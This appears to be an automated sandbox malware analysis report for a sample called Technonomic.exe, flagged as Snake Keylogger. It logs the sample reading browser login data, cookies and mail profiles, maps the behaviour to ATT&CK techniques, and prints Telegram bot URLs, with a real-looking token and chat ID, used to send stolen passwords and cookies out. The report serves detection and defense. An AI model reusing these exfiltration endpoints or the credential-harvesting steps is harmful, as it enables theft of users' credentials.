            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Technonomic.exeCode function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A5

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000007.00000002.2620412422.00000000258F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000007.00000002.2620412422.00000000257F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7192, type: MEMORYSTR
            Source: Yara matchFile source: 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            3
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
            Virtualization/Sandbox Evasion
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580360 Sample: Technonomic.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 4 other IPs or domains 2->40 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Multi AV Scanner detection for dropped file 2->52 58 6 other signatures 2->58 8 Technonomic.exe 32 2->8         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 36->54 56 Uses the Telegram API (likely for C&C communication) 38->56 process4 file5 22 C:\Users\user\AppData\Local\...\Ifrt.Syd, Unicode 8->22 dropped 24 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->24 dropped 60 Suspicious powershell command line found 8->60 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\Technonomic.exe, PE32 12->26 dropped 28 C:\Users\...\Technonomic.exe:Zone.Identifier, ASCII 12->28 dropped 62 Early bird code injection technique detected 12->62 64 Writes to foreign memory regions 12->64 66 Found suspicious powershell code related to unpacking or dynamic code loading 12->66 68 3 other signatures 12->68 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 api.telegram.org 149.154.167.220, 443, 49962, 49980 TELEGRAMRU United Kingdom 16->30 32 checkip.dyndns.com 193.122.6.168, 49881, 49898, 49907 ORACLE-BMC-31898US United States 16->32 34 3 other IPs or domains 16->34 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 46 Hides threads from debuggers 16->46 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Technonomic.exe45%ReversingLabsWin32.Spyware.Snakekeylogger
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe45%ReversingLabsWin32.Spyware.Snakekeylogger
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.238
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.1
              truefalse
                high
                reallyfreegeoip.org
                172.67.177.134
                truefalse
                  high
                  s-part-0035.t-0009.t-msedge.net
                  13.107.246.63
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      checkip.dyndns.com
                      193.122.6.168
                      truefalse
                        high
                        checkip.dyndns.org
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:114127%0D%0ADate%20and%20Time:%2025/12/2024%20/%2010:58:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20114127%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                high
                                http://checkip.dyndns.org/false
                                  high
                                  https://api.telegram.org/bot8179583980:AAG4cdQWaAviOBBhSs3OrT1OX6_IUptNQv8/sendDocument?chat_id=6070006284&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.office.com/msiexec.exe, 00000007.00000002.2620412422.00000000259DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=msiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.orgmsiexec.exe, 00000007.00000002.2620412422.0000000025939000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.0000000025927000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2620412422.00000000258D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000007.00000002.2621544953.0000000026811000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
